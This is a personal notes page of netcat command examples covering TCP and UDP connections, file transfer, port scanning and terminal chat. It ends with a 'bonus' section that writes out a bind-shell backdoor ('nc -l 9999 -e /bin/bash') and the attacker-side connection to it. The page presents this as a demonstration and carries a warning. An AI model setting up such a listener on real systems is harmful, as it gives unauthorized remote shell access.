
<!doctype html>
<html lang="zh" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <meta name="author" content="Liam_Bob">
      
      
      <link rel="shortcut icon" href="../../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.1.2, mkdocs-material-6.2.2">
    
    
      
        <title>Netcat (nc) command examples - Ruihan</title>
      
    
    
      <link rel="stylesheet" href="../../../assets/stylesheets/main.73f7c429.min.css">
      
        
        <link rel="stylesheet" href="../../../assets/stylesheets/palette.39b8e14a.min.css">
        
          
          
          <meta name="theme-color" content="#02a6f2">
        
      
    
    
    
      
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=:300,400,400i,700%7CRoboto+Mono&display=fallback">
        <style>body,input{font-family:"",-apple-system,BlinkMacSystemFont,Helvetica,Arial,sans-serif}code,kbd,pre{font-family:"Roboto Mono",SFMono-Regular,Consolas,Menlo,monospace}</style>
      
    
    
    
    
      
        
<script>window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)},ga.l=+new Date,ga("create","G-GE9R8TL75Z","auto"),ga("set","anonymizeIp",!0),ga("send","pageview"),document.addEventListener("DOMContentLoaded",function(){document.forms.search&&document.forms.search.query.addEventListener("blur",function(){if(this.value){var e=document.location.pathname;ga("send","pageview",e+"?q="+this.value)}})}),document.addEventListener("DOMContentSwitch",function(){ga("send","pageview",document.location.pathname)})</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
      
    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="" data-md-color-primary="light-blue" data-md-color-accent="deep-purple">
      
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#netcat-nc-command-examples" class="md-skip">
          跳转至
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header-nav md-grid" aria-label="Header">
    <a href="../../.." title="Ruihan" class="md-header-nav__button md-logo" aria-label="Ruihan">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 89 89"><path d="M3.136 17.387v42.932l42.932 21.467L3.136 17.387z"/><path d="M21.91 8l42.933 64.398-18.775 9.388L3.136 17.387 21.91 8z" fill-opacity=".5"/><path d="M67.535 17.387L40.273 35.543l21.878 32.818 5.384 2.691V17.387z"/><path d="M67.535 17.387v53.666l18.774-9.388V8l-18.774 9.387z" fill-opacity=".25"/></svg>

    </a>
    <label class="md-header-nav__button md-icon" for="__drawer">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2z"/></svg>
    </label>
    <div class="md-header-nav__title" data-md-component="header-title">
      <div class="md-header-nav__ellipsis">
        <div class="md-header-nav__topic">
          <span class="md-ellipsis">
            Ruihan
          </span>
        </div>
        <div class="md-header-nav__topic">
          <span class="md-ellipsis">
            
              Netcat (nc) command examples
            
          </span>
        </div>
      </div>
    </div>
    
      <label class="md-header-nav__button md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0116 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 019.5 16 6.5 6.5 0 013 9.5 6.5 6.5 0 019.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
      </label>
      
<div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="搜索" placeholder="搜索" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" data-md-state="active" required>
      <label class="md-search__icon md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0116 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 019.5 16 6.5 6.5 0 013 9.5 6.5 6.5 0 019.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </label>
      <button type="reset" class="md-search__icon md-icon" aria-label="Clear" data-md-component="search-reset" tabindex="-1">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41z"/></svg>
      </button>
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            正在初始化搜索引擎
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
      <div class="md-header-nav__source">
        
<a href="https://github.com/liambob77/liambob77.github.io/" title="前往 GitHub 仓库" class="md-source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><path d="M439.55 236.05L244 40.45a28.87 28.87 0 00-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 01-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 000 40.81l195.61 195.6a28.86 28.86 0 0040.8 0l194.69-194.69a28.86 28.86 0 000-40.81z"/></svg>
  </div>
  <div class="md-source__repository">
    liambob77.github.io
  </div>
</a>
      </div>
    
  </nav>
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-tabs__inner md-grid">
    <ul class="md-tabs__list">
      
        
  
  


  <li class="md-tabs__item">
    <a href="../../.." class="md-tabs__link">
      Welcome to Wu Ruihan Docs
    </a>
  </li>

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../../docs_cici/xessx01/" class="md-tabs__link">
        Docs cici
      </a>
    </li>
  

      
        
  
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../../docs_python/" class="md-tabs__link">
        Docs python
      </a>
    </li>
  

      
        
  
  
    
  


  
  
  
    <li class="md-tabs__item">
      <a href="../../Linux/" class="md-tabs__link md-tabs__link--active">
        Docs tech
      </a>
    </li>
  

      
    </ul>
  </div>
</nav>
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    



  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../../.." title="Ruihan" class="md-nav__button md-logo" aria-label="Ruihan">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 89 89"><path d="M3.136 17.387v42.932l42.932 21.467L3.136 17.387z"/><path d="M21.91 8l42.933 64.398-18.775 9.388L3.136 17.387 21.91 8z" fill-opacity=".5"/><path d="M67.535 17.387L40.273 35.543l21.878 32.818 5.384 2.691V17.387z"/><path d="M67.535 17.387v53.666l18.774-9.388V8l-18.774 9.387z" fill-opacity=".25"/></svg>

    </a>
    Ruihan
  </label>
  
    <div class="md-nav__source">
      
<a href="https://github.com/liambob77/liambob77.github.io/" title="前往 GitHub 仓库" class="md-source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><path d="M439.55 236.05L244 40.45a28.87 28.87 0 00-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 01-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 000 40.81l195.61 195.6a28.86 28.86 0 0040.8 0l194.69-194.69a28.86 28.86 0 000-40.81z"/></svg>
  </div>
  <div class="md-source__repository">
    liambob77.github.io
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      



  <li class="md-nav__item">
    <a href="../../.." class="md-nav__link">
      Welcome to Wu Ruihan Docs
    </a>
  </li>

    
      
      
      



  
  <li class="md-nav__item md-nav__item--nested">
    
    
      <input class="md-nav__toggle md-toggle" data-md-toggle="nav-2" type="checkbox" id="nav-2" >
    
    <label class="md-nav__link" for="nav-2">
      Docs cici
      <span class="md-nav__icon md-icon"></span>
    </label>
    <nav class="md-nav" aria-label="Docs cici" data-md-level="1">
      <label class="md-nav__title" for="nav-2">
        <span class="md-nav__icon md-icon"></span>
        Docs cici
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          



  <li class="md-nav__item">
    <a href="../../../docs_cici/xessx01/" class="md-nav__link">
      学而思2020（秋）一年级数学
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      



  
  <li class="md-nav__item md-nav__item--nested">
    
    
      <input class="md-nav__toggle md-toggle" data-md-toggle="nav-3" type="checkbox" id="nav-3" >
    
    <label class="md-nav__link" for="nav-3">
      Docs python
      <span class="md-nav__icon md-icon"></span>
    </label>
    <nav class="md-nav" aria-label="Docs python" data-md-level="1">
      <label class="md-nav__title" for="nav-3">
        <span class="md-nav__icon md-icon"></span>
        Docs python
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          



  <li class="md-nav__item">
    <a href="../../../docs_python/" class="md-nav__link">
      Python useful links
    </a>
  </li>

        
          
          
          



  <li class="md-nav__item">
    <a href="../../../docs_python/pandas/" class="md-nav__link">
      Useful Pandas Notes
    </a>
  </li>

        
          
          
          



  <li class="md-nav__item">
    <a href="../../../docs_python/python/" class="md-nav__link">
      Python Notes
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  


  
  <li class="md-nav__item md-nav__item--active md-nav__item--nested">
    
    
      <input class="md-nav__toggle md-toggle" data-md-toggle="nav-4" type="checkbox" id="nav-4" checked>
    
    <label class="md-nav__link" for="nav-4">
      Docs tech
      <span class="md-nav__icon md-icon"></span>
    </label>
    <nav class="md-nav" aria-label="Docs tech" data-md-level="1">
      <label class="md-nav__title" for="nav-4">
        <span class="md-nav__icon md-icon"></span>
        Docs tech
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          



  <li class="md-nav__item">
    <a href="../../Linux/" class="md-nav__link">
      Linux Notes
    </a>
  </li>

        
          
          
          



  <li class="md-nav__item">
    <a href="../../git/" class="md-nav__link">
      Git cheat list
    </a>
  </li>

        
          
          
          



  <li class="md-nav__item">
    <a href="../../mercurial/" class="md-nav__link">
      Mercurial Notes
    </a>
  </li>

        
          
          
          



  <li class="md-nav__item">
    <a href="../../mysql/" class="md-nav__link">
      mysql opr records
    </a>
  </li>

        
          
          
          



  <li class="md-nav__item">
    <a href="../../nice_tools/" class="md-nav__link">
      Nice Tools
    </a>
  </li>

        
          
          
          



  <li class="md-nav__item">
    <a href="../../ubuntu/" class="md-nav__link">
      Ubuntu 16.04 Developer Tools Installation
    </a>
  </li>

        
          
          
          



  <li class="md-nav__item">
    <a href="../../vagrant/" class="md-nav__link">
      Vagrant Notes
    </a>
  </li>

        
          
          
          


  


  
  <li class="md-nav__item md-nav__item--active md-nav__item--nested">
    
    
      <input class="md-nav__toggle md-toggle" data-md-toggle="nav-4-8" type="checkbox" id="nav-4-8" checked>
    
    <label class="md-nav__link" for="nav-4-8">
      Network tools
      <span class="md-nav__icon md-icon"></span>
    </label>
    <nav class="md-nav" aria-label="Network tools" data-md-level="2">
      <label class="md-nav__title" for="nav-4-8">
        <span class="md-nav__icon md-icon"></span>
        Network tools
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  


  <li class="md-nav__item md-nav__item--active">
    
    <input class="md-nav__toggle md-toggle" data-md-toggle="toc" type="checkbox" id="__toc">
    
      
    
    
      <label class="md-nav__link md-nav__link--active" for="__toc">
        Netcat (nc) command examples
        <span class="md-nav__icon md-icon"></span>
      </label>
    
    <a href="./" class="md-nav__link md-nav__link--active">
      Netcat (nc) command examples
    </a>
    
      
<nav class="md-nav md-nav--secondary" aria-label="目录">
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      目录
    </label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#1-create-a-connection-using-tcp-with-netcat-command" class="md-nav__link">
    1. Create a Connection Using TCP with netcat command
  </a>
  
    <nav class="md-nav" aria-label="1. Create a Connection Using TCP with netcat command">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#quick-intro-to-tcp-vs-udp" class="md-nav__link">
    Quick Intro to TCP vs UDP
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-create-a-connection-using-udp-with-nc-command" class="md-nav__link">
    2. Create a connection using UDP with nc command
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-use-nc-command-to-transfer-files-between-remote-systems" class="md-nav__link">
    3. Use nc command to transfer files between remote systems
  </a>
  
    <nav class="md-nav" aria-label="3. Use nc command to transfer files between remote systems">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#set-up-the-linux-pc-to-receive" class="md-nav__link">
    Set up the Linux PC to Receive
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#set-up-the-mac-pc-to-send" class="md-nav__link">
    Set up the Mac PC to Send
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-use-nc-command-for-port-scanning" class="md-nav__link">
    4. Use nc command for port scanning
  </a>
  
    <nav class="md-nav" aria-label="4. Use nc command for port scanning">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#zero-io-mode" class="md-nav__link">
    Zero I/O Mode
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-chat-with-netcat" class="md-nav__link">
    5. Chat with Netcat
  </a>
  
    <nav class="md-nav" aria-label="5. Chat with Netcat">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#bonus-tip-create-a-backdoor-with-nc-command" class="md-nav__link">
    Bonus Tip: Create a backdoor with nc command
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
    
  </li>

        
      </ul>
    </nav>
  </li>

        
          
          
          



  
  <li class="md-nav__item md-nav__item--nested">
    
    
      <input class="md-nav__toggle md-toggle" data-md-toggle="nav-4-9" type="checkbox" id="nav-4-9" >
    
    <label class="md-nav__link" for="nav-4-9">
      Ocr
      <span class="md-nav__icon md-icon"></span>
    </label>
    <nav class="md-nav" aria-label="Ocr" data-md-level="2">
      <label class="md-nav__title" for="nav-4-9">
        <span class="md-nav__icon md-icon"></span>
        Ocr
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          



  <li class="md-nav__item">
    <a href="../../ocr/tesseract/" class="md-nav__link">
      tesseract OCR
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

        
      </ul>
    </nav>
  </li>

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    
<nav class="md-nav md-nav--secondary" aria-label="目录">
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      目录
    </label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#1-create-a-connection-using-tcp-with-netcat-command" class="md-nav__link">
    1. Create a Connection Using TCP with netcat command
  </a>
  
    <nav class="md-nav" aria-label="1. Create a Connection Using TCP with netcat command">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#quick-intro-to-tcp-vs-udp" class="md-nav__link">
    Quick Intro to TCP vs UDP
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-create-a-connection-using-udp-with-nc-command" class="md-nav__link">
    2. Create a connection using UDP with nc command
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-use-nc-command-to-transfer-files-between-remote-systems" class="md-nav__link">
    3. Use nc command to transfer files between remote systems
  </a>
  
    <nav class="md-nav" aria-label="3. Use nc command to transfer files between remote systems">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#set-up-the-linux-pc-to-receive" class="md-nav__link">
    Set up the Linux PC to Receive
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#set-up-the-mac-pc-to-send" class="md-nav__link">
    Set up the Mac PC to Send
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-use-nc-command-for-port-scanning" class="md-nav__link">
    4. Use nc command for port scanning
  </a>
  
    <nav class="md-nav" aria-label="4. Use nc command for port scanning">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#zero-io-mode" class="md-nav__link">
    Zero I/O Mode
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-chat-with-netcat" class="md-nav__link">
    5. Chat with Netcat
  </a>
  
    <nav class="md-nav" aria-label="5. Chat with Netcat">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#bonus-tip-create-a-backdoor-with-nc-command" class="md-nav__link">
    Bonus Tip: Create a backdoor with nc command
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          <div class="md-content">
            <article class="md-content__inner md-typeset">
              
                
                  <a href="https://github.com/liambob77/liambob77.github.io/edit/master/docs/docs_tech/network_tools/nc.md" title="编辑此页" class="md-content__button md-icon">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20.71 7.04c.39-.39.39-1.04 0-1.41l-2.34-2.34c-.37-.39-1.02-.39-1.41 0l-1.84 1.83 3.75 3.75M3 17.25V21h3.75L17.81 9.93l-3.75-3.75L3 17.25z"/></svg>
                  </a>
                
                
                <h1 id="netcat-nc-command-examples">Netcat (nc) command examples<a class="headerlink" href="#netcat-nc-command-examples" title="Permanent link">&para;</a></h1>
<p>Here’s the syntax for the nc command:</p>
<pre><code class="language-bash">nc [options] [hostname] [port]
</code></pre>
<p>The syntax can vary depending on the application, but for most uses, your commands will follow this basic pattern.</p>
<h2 id="1-create-a-connection-using-tcp-with-netcat-command">1. Create a Connection Using TCP with netcat command<a class="headerlink" href="#1-create-a-connection-using-tcp-with-netcat-command" title="Permanent link">&para;</a></h2>
<p>As I mentioned earlier, the core functionality of netcat is joining two machines together. You can set up a connection using TCP to connect two separate machines, you can also emulate that connection using the terminal.</p>
<p>The Listening Machine:</p>
<pre><code class="language-bash">nc -l 8080
</code></pre>
<p>This command opens port 8080 and tells the machine to begin listening on this port.</p>
<p>In order to establish a connection, you will use another terminal and enter the following.</p>
<p>The Client Machine:</p>
<pre><code class="language-bash">nc 127.0.0.1 8080
</code></pre>
<p>You can also use ‘localhost’ in place of the IP, or use the IP of your second PC here if you are making a remote connection.</p>
<p>That’s it, you have opened a TCP port and established a connection between two systems.</p>
<h3 id="quick-intro-to-tcp-vs-udp">Quick Intro to TCP vs UDP<a class="headerlink" href="#quick-intro-to-tcp-vs-udp" title="Permanent link">&para;</a></h3>
<p>Why do we use TCP by default? TCP is an older technology than UDP and they operate at different levels of the OSI model. I will give a quick overview of the differences between them and describe some situations where you may choose one over the other.</p>
<p>TCP has strong error-correction capabilities. What does that mean? Basically, this means that while data packets are in transit from system to system, there are continuous tests being performed. These tests make sure that the information from System A is copied accurately to System B. This is a very simplified version of what happens as information travels across networks (the internet).</p>
<p>There are many protocols used in internet communication, though, not just TCP. UDP has different rules than TCP. Neither is necessarily “better” but they can each excel at performing different tasks.</p>
<p>Why would we use UDP over TCP or vice versa? It depends on the application. TCP is slower, but more reliable for transferring data accurately.</p>
<p>UDP can be chosen in situations where speed is more important than reliability transmitting information. One example of this is streaming data, like video. Video can be transferred more quickly over UDP, and even if there are errors in the transmission, they are less likely to impact the user experience.</p>
<h2 id="2-create-a-connection-using-udp-with-nc-command">2. Create a connection using UDP with nc command<a class="headerlink" href="#2-create-a-connection-using-udp-with-nc-command" title="Permanent link">&para;</a></h2>
<p>The steps for making a UDP connection are virtually identical to the ones we’ve already followed. You will add an option flag to specify that the type of port you want to open is UDP, not the default TCP.</p>
<pre><code class="language-bash">nc -l -u 999
</code></pre>
<p>It’s that simple. That’s all you need to do to open UDP port ‘999’.</p>
<p>You might wonder if you can use TCP and UDP with the same port number. You can, because they are separate protocols.</p>
<h2 id="3-use-nc-command-to-transfer-files-between-remote-systems">3. Use nc command to transfer files between remote systems<a class="headerlink" href="#3-use-nc-command-to-transfer-files-between-remote-systems" title="Permanent link">&para;</a></h2>
<p>There are other methods for transferring files from one system to another. You can also use the netcat command for this purpose.</p>
<p>For this example, I created a demo that illustrates a remote file transfer from my Linux machine to my MacBook Pro.</p>
<h3 id="set-up-the-linux-pc-to-receive">Set up the Linux PC to Receive<a class="headerlink" href="#set-up-the-linux-pc-to-receive" title="Permanent link">&para;</a></h3>
<pre><code class="language-bash">nc -l 9999 &gt; fromMac.file
</code></pre>
<p>You begin listening on the receiving machine on TCP port 9999. The ‘&gt;‘ tells the machine you are expecting a file to be transferred. The name that follows is the local name for the file.</p>
<h3 id="set-up-the-mac-pc-to-send">Set up the Mac PC to Send<a class="headerlink" href="#set-up-the-mac-pc-to-send" title="Permanent link">&para;</a></h3>
<p>nc 172.20.1.168 9999 &lt; toLinux.file
The IP address here belongs to the Linux machine. You flip the symbol to ‘&lt;‘ and the file ‘toLinux.file’ will be copied onto the remote machine as ‘fromMac.file’.</p>
<h2 id="4-use-nc-command-for-port-scanning">4. Use nc command for port scanning<a class="headerlink" href="#4-use-nc-command-for-port-scanning" title="Permanent link">&para;</a></h2>
<p>There might be more efficient options for port scanning, but it can be done with netcat. Since netcat comes installed by default on most operating systems, it’s nice to know how to do this if you need to do some quick troubleshooting. You’ll use the ‘-n’ and display verbose output.</p>
<pre><code class="language-bash">nc -v -n 127.0.0.1 1-100
</code></pre>
<p>This attempts to make a connection to ports between 1-100. Port 80 is HTTP, as I’m sure many of you know. This port is normally open on machines because it is used for connecting to the internet.</p>
<p>When I use this command, I’m actually attempting to connect to all of the ports between 1-100. It successfully connects to port 80, but generates an error message from Apache. I end up with some HTML output on the terminal because my computer sees it as a bad page request.</p>
<pre><code class="language-bash">[...]
nc: connect to 127.0.0.1 port 77 (tcp) failed: Connection refused
nc: connect to 127.0.0.1 port 78 (tcp) failed: Connection refused
nc: connect to 127.0.0.1 port 79 (tcp) failed: Connection refused
Connection to 127.0.0.1 80 port [tcp/*] succeeded!

HTTP/1.1 400 Bad Request
Date: Fri, 20 Dec 2019 15:08:29 GMT
Server: Apache/2.4.38 (Ubuntu)
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

&lt;!DOCTYPE HTML PUBLIC &quot;-//IETF//DTD HTML 2.0//EN&quot;&gt;
&lt;html&gt;&lt;head&gt;
&lt;title&gt;400 Bad Request&lt;/title&gt;
&lt;/head&gt;&lt;body&gt;
&lt;h1&gt;Bad Request&lt;/h1&gt;
&lt;p&gt;Your browser sent a request that this server could not understand.&lt;br /&gt;
&lt;/p&gt;
&lt;hr&gt;
&lt;address&gt;Apache/2.4.38 (Ubuntu) Server at pop-os.localdomain Port 80&lt;/address&gt;
&lt;/body&gt;&lt;/html&gt;
</code></pre>
<h3 id="zero-io-mode">Zero I/O Mode<a class="headerlink" href="#zero-io-mode" title="Permanent link">&para;</a></h3>
<p>To avoid this, you can use the -z flag, which stands for zero input/output. This is the built-in port-scanning mode for netcat. I still get the same language, but it does not actually make the connection to port 80 generating the bad request error. Instead it continues through all scanned ports.</p>
<h2 id="5-chat-with-netcat">5. Chat with Netcat<a class="headerlink" href="#5-chat-with-netcat" title="Permanent link">&para;</a></h2>
<p>This is a more fun way to use netcat. When you establish a TCP connection like above, you can actually “chat” from machine to machine. It’s less novel in an era where texting and chat applications are ubiquitous but this would have totally blown someone’s mind back in 1996.</p>
<h3 id="bonus-tip-create-a-backdoor-with-nc-command">Bonus Tip: Create a backdoor with nc command<a class="headerlink" href="#bonus-tip-create-a-backdoor-with-nc-command" title="Permanent link">&para;</a></h3>
<p>I will show this for demonstration purposes only. Please be aware that unauthorized use of this command could be considered criminal activity in your locale.</p>
<p>In fact, this command no longer does anything with ‘nc’. There are ways to do it, but you will have to find them somewhere else. Once again, this is intended only to show the capability.</p>
<p>The -e flag makes something executable. A common way for malicious actors to gain access is to create such a backdoor on an open port and use that to execute scripts or otherwise manipulate the file system.</p>
<p>So if the attacker somehow gained the access to the “victim” machine, he/she can create a backdoor like this:</p>
<pre><code class="language-bash">nc -l 9999 -e /bin/bash
</code></pre>
<p>Now the attackers can use this backdoor to access into the system remotely and execute commands. So, from attacker’s system:</p>
<pre><code class="language-bash">nc 192.168.1.10 9999
ls
Desktop
Documents
Downloads
Music 
Pictures
Public
Templates
Videos
firefox linuxhandbook.com
</code></pre>
<p>This enables the attacker to access your computer remotely from the command line. Once connected, I can run bash commands similarly to how I could if I was using the computer directly.</p>
<p>I’m sure you can imagine how someone without the best of intentions could abuse this power. This makes it very important to monitor port activity on any network.</p>
<p>I hope you enjoyed this brief introduction to the netcat command. As always, let us know what you think in the comment section.</p>
                
              
              
                


              
            </article>
          </div>
        </div>
      </main>
      
        
<footer class="md-footer">
  
    <div class="md-footer-nav">
      <nav class="md-footer-nav__inner md-grid" aria-label="Footer">
        
          <a href="../../vagrant/" class="md-footer-nav__link md-footer-nav__link--prev" rel="prev">
            <div class="md-footer-nav__button md-icon">
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
            </div>
            <div class="md-footer-nav__title">
              <div class="md-ellipsis">
                <span class="md-footer-nav__direction">
                  上一页
                </span>
                Vagrant Notes
              </div>
            </div>
          </a>
        
        
          <a href="../../ocr/tesseract/" class="md-footer-nav__link md-footer-nav__link--next" rel="next">
            <div class="md-footer-nav__title">
              <div class="md-ellipsis">
                <span class="md-footer-nav__direction">
                  下一页
                </span>
                tesseract OCR
              </div>
            </div>
            <div class="md-footer-nav__button md-icon">
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11H4z"/></svg>
            </div>
          </a>
        
      </nav>
    </div>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-footer-copyright">
        
          <div class="md-footer-copyright__highlight">
            Copyright &copy; 2018 - 2020 Liam_Bob
          </div>
        
        Made with
        <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
          Material for MkDocs
        </a>
      </div>
      
  <div class="md-footer-social">
    
      
      
      <a href="" target="_blank" rel="noopener" title="Liam_Bob on weixin" class="md-footer-social__link">
